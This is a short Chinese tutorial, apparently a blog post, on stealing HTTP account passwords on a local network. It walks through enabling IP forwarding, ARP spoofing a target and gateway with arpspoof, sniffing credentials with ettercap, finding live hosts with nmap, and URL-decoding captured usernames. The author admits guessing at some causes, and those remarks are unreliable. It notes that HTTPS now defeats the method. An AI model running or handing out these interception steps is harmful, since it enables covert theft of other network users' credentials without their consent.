内网获取http账号密码

方法:ettercap配合arpspoof

注意:由于linux系统出于安全的角度,是不支持默认开启ip转发功能的,所以,需要手动做一些设置。

设置方法:将/proc/sys/net/ipv4的ip_forward默认为0改成1就是开启了ip转发。

命令:

cat /proc/sys/net/ipv4/ip_forward    可以查看此刻ip_forward的状态是0还是1

若是0,则表示ip转发关闭了,所以,需要修改

echo 1 > /proc/sys/net/ipv4/ip_forward    将1输入ip_forward文件中,开启ip转发

注意:网关必须要是动态的,才能欺骗成功,若是静态的,则无法欺骗不成功,查看方法,cmd命令下,arp -a就可以看到。静态的应该是代表MAC和IP进行绑定,动态应该是指没绑定(个人猜测)

步骤:

第一步:arpspoof欺骗成功

arpspoof -t 192.168.1.130 192.168.1.1 -i eth0

最好按这种格式,规范一点,网卡放在最后。第一个ip为目标ip,第二个为网关地址

第二步:使用ettercap

ettercap -Tq -i eth0

-T 表示使用ettercap的文本模式,以前试过图形模式

-q  可以和-T连在一起写,也可以分开写,表示使用静态模式。貌似不用静态模式会有数据一直滚动。

注意:若在获取数据的过程中,目标主机与网络断开了链接,那么我们最好重新欺骗,至于原因么,我还不清楚。。。但是,我估计,是因为主机IP要重新动态分配,但是这个重新分配的时间和分配的规则,得看设置的人如何设置了。所以为了保险,重新欺骗吧。

同时,若对方的用户名为中文,那么在抓到相应密码的同时,是编码过后的样子,我们看不懂,那么怎么办?网上有很多的URL解码,将用户名解码之后就能看到中文了。

补充:在同一个局域网中如何获得在线主机的IP?

利用nmap进行扫描即可。

nmap -sL 192.168.1.1-254 快速扫描,展现一个列表,里面有在线主机和不在线的地址,同时还有主机名字

nmap -sP 192.168.43.0/24  展现在线主机,包括MAC地址,设备厂商,如华为,苹果,IP地址,设备名称(推荐这种方法)

总结:现在基本都是https协议了,所以,这方法算是废了。但是,可以熟悉一下操作。

你可能感兴趣的:(内网获取http账号密码)